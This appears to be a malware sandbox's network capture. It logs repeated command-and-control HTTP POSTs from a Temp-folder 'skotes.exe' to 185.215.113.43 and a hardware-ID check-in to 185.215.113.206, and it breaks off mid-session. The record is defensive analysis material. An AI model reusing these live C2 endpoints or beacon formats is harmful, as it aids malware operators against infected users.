Dec 14, 2024 23:59:33.795845032 CET	224	IN	Data Raw: eb 32 d3 16 3f e0 de 71 f7 88 b0 9c 58 7a 03 a0 d6 69 71 59 33 6d a5 d9 26 58 b1 0b b7 57 eb 85 54 92 38 de 46 e0 7b 59 94 bf bf eb bd 41 5b 81 e5 69 a0 9a b7 cf da a2 f8 17 02 4b fa 25 a1 3a 0e 5d 82 6c f5 79 32 eb 4f fc d6 18 56 6c f8 ec 0a f9 Data Ascii: 2?qXziqY3m&XWT8F{YA[iK%:]ly2OVlGoUw/d#H\|xyw*H1)&Y5FD?_"Tv,L o$z8`cT{wj{g39[-y'8n>g\|(K,,E_,(1YP9X
Dec 14, 2024 23:59:33.796037912 CET	1236	IN	Data Raw: f5 13 bc c5 92 a1 99 42 28 65 c3 87 d8 e8 fe 66 99 a6 9d 8a d4 57 ff 20 bc 9e 0b 93 be 99 9f 36 9e 59 81 36 d2 7b 07 04 36 4d 62 35 05 31 5f 3e 01 7c 61 ab f3 0f 7a 57 9c c9 80 d3 17 49 46 66 5c ac cf 21 5f ac f1 04 dc 2d eb 20 3f 86 d8 eb 01 3b Data Ascii: B(efW 6Y6{6Mb51_>\|azWIFf\!_- ?;jY5WaUGT"\|\|Bn@yjOOG<u5<p)95v!<H',SxQ-'Uew}e6bJj1DRkCw
Dec 14, 2024 23:59:33.915483952 CET	1236	IN	Data Raw: f0 12 b0 f3 80 97 a5 53 85 32 8a 32 ea 95 ad e6 85 c2 36 24 f9 39 e7 39 04 59 35 51 c5 29 60 d1 bf 9a 75 b8 dd f9 97 48 2a 94 f4 16 4e fd c9 15 8c b1 04 52 b3 b7 40 83 3c db 38 53 9e e5 ec 83 0a 2a 61 27 d2 78 ef 64 bb 12 8a ae e7 2f 5b 4b 96 21 Data Ascii: S226$99Y5Q)`uHNR@<8Sa'xd/[K!_#P2TD?!{H:h#?lq+x>-5~p"$w6#~;\|jGrA&`\7Clz7H4LuraG.q/G/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50071	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:39.549592018 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015359001&unit=246122658369
Dec 14, 2024 23:59:40.871464014 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	50084	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:41.059401989 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 23:59:42.404354095 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:59:42.407660007 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKK Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build"stok------HCAEHJJKFCAAFHJKFBKK--
Dec 14, 2024 23:59:42.855205059 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50095	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:42.649024010 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 23:59:43.982808113 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50114	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:45.715967894 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 23:59:47.058233023 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50134	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:48.820116997 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 23:59:50.175369978 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50141	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:51.816683054 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 23:59:53.176525116 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50148	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:54.915580034 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 23:59:56.246573925 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50154	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:59:57.895168066 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 23:59:59.247755051 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50157	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:00.992681980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:02.339741945 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50159	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:03.977770090 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:05.325015068 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50162	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:07.070622921 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:08.401539087 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50165	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:10.073873043 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:11.411111116 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50168	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:13.152837038 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:14.492544889 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50171	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:16.131166935 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:17.467955112 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50174	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:19.211222887 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:20.559891939 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50177	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:22.209019899 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:23.562571049 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	50179	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:25.308341026 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:26.640207052 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	50181	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:28.284012079 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:29.636702061 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	50183	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:31.384569883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:32.718111038 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	50186	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:34.360230923 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:35.733525991 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50187	185.215.113.43	80	7104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:37.478297949 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:38.827137947 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	50189	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
